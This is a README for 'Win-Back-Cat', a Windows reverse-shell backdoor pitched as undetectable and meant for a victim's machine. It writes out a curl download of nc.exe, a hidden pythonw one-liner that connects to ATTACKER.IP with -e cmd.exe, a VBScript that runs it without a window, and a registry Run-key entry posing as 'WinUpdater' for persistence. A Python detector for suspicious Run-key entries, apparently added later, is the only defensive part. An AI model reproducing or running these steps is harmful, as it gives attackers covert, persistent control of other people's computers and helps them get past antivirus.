Win-Back-Cat

A fully undetected, hidden, persistent, reverse netcat shell backdoor for Windows.

Prerequisites:


  • You need to be logged in as an Administrator in order to be able to create a TCP listener with NetCat.

Python:

  • Python should be preinstalled on the latest versions of Windows.
  • You can check by running python --version at the command prompt.
  • If Python is not installed, you will need to install it for this to work.

cURL:

  • If you have version 1803 or later of Windows 10, cURL is installed by default.
  • If you don't have cURL, you will need to install it for this to work.
  • Otherwise, find an alternative way to fetch nc.exe.



Installation / How to use:

  • Very simple: download and execute the batch script win-back-cat.bat on the victim's machine.
  • Run a netcat listener on the attacker machine (ATTACKER.IP) to get a shell back. Example: netcat -lvp 4445

Breakdown (What's in the script):


  • Move into the Temp folder via the %TEMP% environment variable, as this helps with compatibility between Windows versions.

  • Fetch our Netcat build from the repo with:
    curl https://raw.githubusercontent.com/RAF-87/win-back-cat/main/files/nc.exe > nc.exe


Why? - Reverse Shell


We need the Linux version of Netcat compiled for Windows, instead of the common OpenBSD version.

The feature we need is this one:
  • -e filename: specify filename to exec after connect (use with caution). Connects STDIN and STDOUT to the specified file.

In our case the filename will be cmd.exe. This flag is missing from some versions for obvious security reasons.


Pythonw - Undetected


  • Why pythonw.exe instead of python.exe?

pythonw.exe is a GUI app for launching GUI or no-UI-at-all scripts.

  • NO console window is opened.

  • Execution is asynchronous: when invoked from a console window, the script is merely launched and the prompt returns right away, whether the script is still running or not.

  • Windows trusts python. 🤷


pythonw -c "from subprocess import check_output; check_output('nc.exe ATTACKER.IP 4445 -e cmd.exe', shell=True);" >> wncat.bat

We use -c to run the script as a one-liner from a string. We write it out to a batch script for easier execution chained with the next step.


Visual Basic - Hidden


Dim WinScriptHost
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%TEMP%\wncat.bat" & Chr(34), 0
Set WinScriptHost = Nothing

The above script will run our batch script as a separate process in the background without the user ever seeing anything. We need this to keep pythonw.exe alive in the background; otherwise, using just the batch script, we would need a command prompt window always open.


Windows Registry - Persistent


reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v WinUpdater /t REG_SZ /d "%TEMP%\wncat.vbs"

We add our Visual Basic script to the registry Run key so it is launched when Windows boots up. So whenever we lose the connection, the backdoor will reopen at the next reboot.
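As an added defender-side example (not part of this repository), the check below parses the output of reg query on the HKCU Run key and flags entries with the shape this step creates: a script file, or a script host, launched from a user-writable temp or AppData path. The sample reg query output is constructed; the column layout is assumed to match what reg query prints on Windows 10, and note that cmd.exe expands %TEMP% before reg add stores the value, so the stored data is the absolute path.

```python
import re

# Constructed sample of `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"`
# output (assumed shape; not captured from a real host).
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    WinUpdater    REG_SZ    C:\Users\alice\AppData\Local\Temp\wncat.vbs
    Updater2    REG_EXPAND_SZ    wscript.exe //B "%TEMP%\helper.js"
"""

# Script file types that Windows will happily run from an autorun entry.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.IGNORECASE)
# Interpreters/hosts commonly used to run such scripts without a visible window.
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|cmd|powershell|pythonw?|mshta)(\.exe)?\b", re.IGNORECASE)
# Locations any unprivileged user can write to; legitimate autoruns rarely live here.
USER_WRITABLE = re.compile(
    r"(%TEMP%|%TMP%|%APPDATA%|\\AppData\\Local\\Temp\\|\\Temp\\|\\Users\\Public\\)", re.IGNORECASE
)


def parse_run_key(text):
    """Turn `reg query` output into (value_name, reg_type, data) tuples."""
    entries = []
    for line in text.splitlines():
        if not line.startswith(" "):
            continue  # the key path line and blank lines carry no values
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)  # columns are 4-space separated
        if len(parts) == 3 and parts[1].startswith("REG_"):
            entries.append(tuple(parts))
    return entries


def assess_entry(data):
    """Return the reasons an autorun command looks like script-based persistence."""
    reasons = []
    if SCRIPT_EXT.search(data):
        reasons.append("launches a script file")
    if SCRIPT_HOST.search(data):
        reasons.append("invokes a script host")
    if USER_WRITABLE.search(data):
        reasons.append("lives in a user-writable temp/appdata path")
    return reasons


def find_suspicious_autoruns(text):
    """Map value name -> reasons for every Run entry that trips at least one heuristic."""
    findings = {}
    for name, _reg_type, data in parse_run_key(text):
        reasons = assess_entry(data)
        if reasons:
            findings[name] = reasons
    return findings
```

On a live host, feed it the real output of reg query for the HKCU and HKLM Run and RunOnce keys; the WinUpdater entry this script creates is caught by both the script-extension and temp-path heuristics.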


Tested on (feel free to add to this list with a request):


  • OS: Microsoft Windows 10 Pro 10.0.18363 N/A Build 18363
  • Antivirus: Microsoft Defender, BitDefender



Note:

  • Using these combined tools, neither Windows nor any antivirus can detect this backdoor.
  • Remember to edit ATTACKER.IP for the reverse shell to work.




Contact